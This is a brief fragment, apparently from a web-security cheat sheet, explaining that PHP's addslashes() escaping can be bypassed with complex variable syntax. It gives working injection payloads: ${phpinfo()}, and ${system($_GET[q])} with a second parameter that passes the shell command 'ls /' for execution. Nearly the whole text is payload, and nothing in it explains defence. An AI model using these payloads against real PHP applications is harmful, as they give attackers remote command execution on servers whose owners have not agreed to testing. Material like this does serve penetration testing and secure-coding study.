The function addslashes() can be bypassed by using complex variables like ${VARIABLE}, for example ${phpinfo()} or using a second HTTP parameter for input via
addslashes()
${VARIABLE}
${phpinfo()}
${system($_GET[q])}&q=ls+/